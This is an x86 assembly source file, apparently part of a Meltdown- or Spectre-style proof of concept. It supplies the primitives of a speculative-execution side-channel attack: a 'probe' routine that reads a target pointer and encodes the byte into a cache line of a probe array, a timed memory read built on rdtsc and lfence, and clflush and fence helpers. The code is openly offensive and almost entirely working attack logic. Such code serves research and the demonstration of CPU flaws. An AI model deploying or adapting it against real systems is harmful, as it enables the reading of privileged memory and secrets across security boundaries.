/*-
 * Copyright (c) 2018
 *      Bill Paul <wpaul@windriver.com>.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by Bill Paul.
 * 4. Neither the name of the author nor the names of any co-contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL Bill Paul OR THE VOICES IN HIS HEAD
 * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
 * THE POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * probe (pointers, flags, idx, probe_array)
 *
 * 4(%esp) == pointers[]
 * 8(%esp) == flags[]
 * 12(%esp) == idx
 * 16(%esp) == probe_array[]
 */

	.text
	.globl	probe
	.p2align	4, 0x90
	.type	probe,@function
probe:

	/* Load flag from flags[i] */

	/* If it's TRUE, exit, otherwise continue */

	mov	8(%esp), %eax
	mov	12(%esp), %edx
	cmp	$0, (%eax, %edx, 4)
	jne	exit
retry:
	/* Try to read *pointers[i] */

	mov	4(%esp), %eax
	mov	(%eax, %edx, 4), %edx
	xorl	%eax, %eax
	mov	(%edx), %al

	/* Shift value to create a page number */

	shl	$12, %eax
	jz	retry

	/*
         * Now try to read probe_array[target * 4096]
	 * The CPU may mis-predict that it needs to do this and
	 * in the process it will do a speculative cache load
	 * of this location.
	 */

	mov	16(%esp), %edx
	mov	(%edx, %eax), %dl

	/*
	 * In the non-speculative case, this flush will execute
	 * and evict the touched block again. In the speculative
	 * case, the touched location will remain cached.
	 */

	clflush	(%edx, %eax)
exit:
	ret

	.globl	time_read_access
	.type	time_read_access,@function
time_read_access:

	/* Get timestamp, save in %edx */

	lfence
	rdtsc
	mov	%eax, %ecx

	/* Access memory */

	mov	4(%esp), %edx
	mov	(%edx), %al

	/* Get another timestamp */

	lfence
	rdtsc

	/*
	 * Subtract old timestamp from new
	 * Note: we ignore the upper 32 bits of the
	 * timestamp value. Our measurements will never take long
	 * enough that we'll need them, and this saves a couple
	 * of instructions.
	 */

	sub	%ecx, %eax

	xor	%edx, %edx
	ret

	.globl	lfence
	.type	lfence,@function
lfence:
	lfence
	ret

	.globl	mfence
	.type	mfence,@function
mfence:
	mfence
	ret

	.globl	cflush
	.type	cflush,@function
cflush:
	mov	4(%esp), %eax
	clflush	(%eax)
	ret
